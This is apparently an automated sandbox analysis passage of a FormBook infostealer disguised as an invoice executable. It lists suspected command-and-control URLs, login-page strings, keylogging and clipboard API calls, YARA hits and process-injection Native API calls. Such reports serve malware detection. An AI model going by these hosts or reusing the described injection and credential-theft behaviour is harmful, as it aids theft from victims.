20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 35 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 72 67 65 6e 65 72 6f 75 73 72 73 2e 73 74 6f 72 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 119<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.55 (Unix) Server at www.rgenerousrs.store Port 80</address></body></html>0
                Source: waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot
                Source: waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix
                Source: waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf
                Source: waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold
                Source: waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf
                Source: waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff
                Source: waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2
                Source: waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot
                Source: waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix
                Source: waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf
                Source: waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular
                Source: waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf
                Source: waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff
                Source: waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2
                Source: waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/js/min.js?v2.3
                Source: waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/28903/search.png)
                Source: waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/28905/arrrow.png)
                Source: waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/29590/bg1.png)
                Source: waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/8934/rcomlogo.jpg
                Source: waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.Jcsa.info
                Source: waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.jcsa.info/Business_Degrees.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImkeHsR12xV
                Source: waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.jcsa.info/College_Information.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImkeHsR1
                Source: waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.jcsa.info/Education_Grant.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImkeHsR12xVM
                Source: waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.jcsa.info/Education_Seminars.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImkeHsR12
                Source: waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.jcsa.info/University_of_Toronto.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImkeHs
                Source: waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.jcsa.info/__media__/js/trademark.php?d=jcsa.info&type=dflt
                Source: waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.jcsa.info/display.cfm
                Source: nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000031AE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.madhf.tech/3iym/?bV=hj5olkscFnqSpGab0vn3LNHrBnWaORens9/m32Sz6t4FBTGsttWpVpCBqSKeTRLk/faBY
                Source: waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.register.com/?trkID=WSTm3u15CW
                Source: waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.register.com?trkID=WSTm3u15CW
                Source: nfGtWoQBhJSQ.exe, 00000006.00000002.4471509831.0000000004A8A000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.rgenerousrs.store
                Source: nfGtWoQBhJSQ.exe, 00000006.00000002.4471509831.0000000004A8A000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.rgenerousrs.store/8gp4/
                Source: waitfor.exe, 00000005.00000003.2490584136.0000000007BBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: waitfor.exe, 00000005.00000002.4470341771.00000000057AA000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.0000000002E8A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn-bj.trafficmanager.net/?hh=
                Source: waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.consentmanager.net
                Source: waitfor.exe, 00000005.00000003.2490584136.0000000007BBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: waitfor.exe, 00000005.00000003.2490584136.0000000007BBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: waitfor.exe, 00000005.00000003.2490584136.0000000007BBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://delivery.consentmanager.net
                Source: nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
                Source: waitfor.exe, 00000005.00000003.2490584136.0000000007BBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: waitfor.exe, 00000005.00000003.2490584136.0000000007BBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: waitfor.exe, 00000005.00000003.2490584136.0000000007BBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: waitfor.exe, 00000005.00000002.4468568240.0000000000A61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: waitfor.exe, 00000005.00000002.4468568240.0000000000A61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: waitfor.exe, 00000005.00000002.4468568240.0000000000A61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_des
                Source: waitfor.exe, 00000005.00000002.4468568240.0000000000A61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: waitfor.exe, 00000005.00000002.4468568240.0000000000A61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: waitfor.exe, 00000005.00000002.4468568240.0000000000A61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: waitfor.exe, 00000005.00000003.2486126896.0000000007B97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: waitfor.exe, 00000005.00000003.2490584136.0000000007BBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: waitfor.exe, 00000005.00000003.2490584136.0000000007BBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.register.com/whois.rcmx?domainName=Jcsa.info
                Source: waitfor.exe, 00000005.00000002.4470341771.000000000643A000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.0000000003B1A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://zkdamdjj.shop/swhs/?bV=8xf1FTtyUpYkrTYPPLWUAP
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002C4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_002C4164
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002C4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_002C4164
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002C3F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_002C3F66
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002B001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_002B001C
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: 0_2_002DCABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_002DCABC

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.2297054463.0000000003200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4469589553.0000000000CB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2296706560.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4468208787.0000000000820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4469588528.0000000002FB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4469517194.0000000000C60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2298090586.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Binary is likely a compiled AutoIt script file
                Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exeCode function: This is a third-party compiled AutoIt script.0_2_00253B3A
                Source: Proforma invoice - Arancia NZ.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: Proforma invoice - Arancia NZ.exe, 00000000.00000000.2003704468.0000000000304000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_a3e781bd-f
                Source: Proforma invoice - Arancia NZ.exe, 00000000.00000000.2003704468.0000000000304000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_1bbb6621-a
                Source: Proforma invoice - Arancia NZ.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_908154c8-3
                Source: Proforma invoice - Arancia NZ.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_4d261512-4
                Initial sample is a PE file and has a suspicious name
                Source: initial sampleStatic PE information: Filename: Proforma invoice - Arancia NZ.exe
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042CFC3 NtClose,2_2_0042CFC3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040AE71 NtAllocateVirtualMemory,2_2_0040AE71
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372B60 NtClose,LdrInitializeThunk,2_2_03372B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03372DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03372C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033735C0 NtCreateMutant,LdrInitializeThunk,2_2_033735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03374340 NtSetContextThread,2_2_03374340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03374650 NtSuspendThread,2_2_03374650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372BA0 NtEnumerateValueKey,2_2_03372BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372B80 NtQueryInformationFile,2_2_03372B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372BF0 NtAllocateVirtualMemory,2_2_03372BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372BE0 NtQueryValueKey,2_2_03372BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372AB0 NtWaitForSingleObject,2_2_03372AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372AF0 NtWriteFile,2_2_03372AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372AD0 NtReadFile,2_2_03372AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372F30 NtCreateSection,2_2_03372F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372F60 NtCreateProcessEx,2_2_03372F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372FB0 NtResumeThread,2_2_03372FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372FA0 NtQuerySection,2_2_03372FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372F90 NtProtectVirtualMemory,2_2_03372F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372FE0 NtCreateFile,2_2_03372FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372E30 NtWriteVirtualMemory,2_2_03372E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372EA0 NtAdjustPrivilegesToken,2_2_03372EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372E80 NtReadVirtualMemory,2_2_03372E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372EE0 NtQueueApcThread,2_2_03372EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372D30 NtUnmapViewOfSection,2_2_03372D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372D10 NtMapViewOfSection,2_2_03372D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372D00 NtSetInformationFile,2_2_03372D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372DB0 NtEnumerateKey,2_2_03372DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372DD0 NtDelayExecution,2_2_03372DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372C00 NtQueryInformationProcess,2_2_03372C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372C60 NtCreateKey,2_2_03372C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372CA0 NtQueryInformationToken,2_2_03372CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372CF0 NtOpenProcess,2_2_03372CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372CC0 NtQueryVirtualMemory,2_2_03372CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03373010 NtOpenDirectoryObject,2_2_03373010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03373090 NtSetValueKey,2_2_03373090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033739B0 NtGetContextThread,2_2_033739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03373D10 NtOpenProcessToken,2_2_03373D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03373D70 NtOpenThread,2_2_03373D70
